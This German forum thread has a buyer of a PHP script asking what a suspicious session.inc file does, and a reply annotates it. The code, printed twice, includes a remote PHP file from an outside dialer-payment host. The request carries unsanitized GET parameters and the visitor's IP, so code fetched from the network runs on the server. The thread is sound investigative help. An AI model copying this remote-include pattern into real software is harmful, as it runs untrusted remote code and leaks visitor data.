Sieht so aus , als würde beim Login abgefragt werden ob die IP des Users innerhalb einer bestimmten Range liegt - wenn dies der Fall ist, gelten für diesen andere Login Regeln - so interpretiere ich es ohne genauer zu sehen wass die Folgelinks bewirken.
Da es sich hier um Mainpean handelt, die Zahlungssysteme anbieten denke ich , dass die nur den Usern den Zutritt zum Angebot erlauben, die auch wirklich bezahlen und über die IP gekommen sind.
-
Nächstes mal bitte gleich selbst die PHP-Tags des Forums benutzen.PHP-Code:<?php
session_start();
// alles nur, wenn $dialer gesetzt ist
if($dialer) {
// IP des Users erfassen
$ip = getenv('REMOTE_ADDR');
// IP-Adressbereiche
$arrAllowsRasIp = array(
// ...
);
// prüft ob $ip in IP-Bereichen liegt
function isRasUser($ip, $arrAllowsRasIp) {
// ....
}
// wenn User-IP in erlaubten IP-Bereichen ...
if(isRasUser($ip, $arrAllowsRasIp)) {
// wird ein Variable gesetzt, aber nix passiert damit
$linkQuery = '';
// sonst (User-IP nicht erlaubt) ...
} else {
// wird eine GET-Übergabe gebastelt ...
$linkQuery = 'auth=' . $_GET['auth'] . '&mode=' . $_GET['mode'];
$codeLogoutQuery = $linkQuery . '&check=dateauktion-de&ip=' . urlencode($ip);
// und damit folgende URL aufgerufen
include('http://paynow.stardialer.de/service/code-logout.php?' . $codeLogoutQuery);
}
}
?>
Falls es dir zu heikel ist, kannst du vor if($dialer) einfach unset($dialer); schreiben und der Code wird nicht mehr ausgeführt. Aber damit reißt du wahrscheinlich ein Loch in deine Authentifizierung.Einen Kommentar schreiben:
-
Was erzwingt dieses Script ?
Hallo !
Haben uns ein Script gekauft und fanden dieses Session.inc Datei ! Leider erreichen wir niemanden, um mal Nachzufragen, was dieses Script aufrufen soll. Uns kommt es etwas seltsam vor ! Kann mir jemand sagen was hier gemacht wird ?
<?php
session_start();
if($dialer)
{
####### code für dialer pay dsl ###
$ip = getenv('REMOTE_ADDR');
$arrAllowsRasIp = array(
'193.159.183.153' => '193.159.183.153',
'193.159.183.160' => '193.159.183.161',
'80.154.10.0' => '80.154.11.255'
);
function isRasUser($ip, $arrAllowsRasIp) {
$retVal = false;
$i = ip2long($ip);
foreach($arrAllowsRasIp as $start => $end) {
$s = ip2long($start);
$e = ip2long($end);
if($i >= $s AND $i <= $e) {
$retVal = true;
break;
}
}
return $retVal;
}
if(isRasUser($ip, $arrAllowsRasIp)) {
$linkQuery = '';
}
else {
$linkQuery = 'auth=' . $_GET['auth'] . '&mode=' . $_GET['mode'];
$codeLogoutQuery = $linkQuery . '&check=dateauktion-de&ip=' . urlencode($ip);
include('http://paynow.stardialer.de/service/code-logout.php?' . $codeLogoutQuery);
}
}
?>
Einen Kommentar schreiben: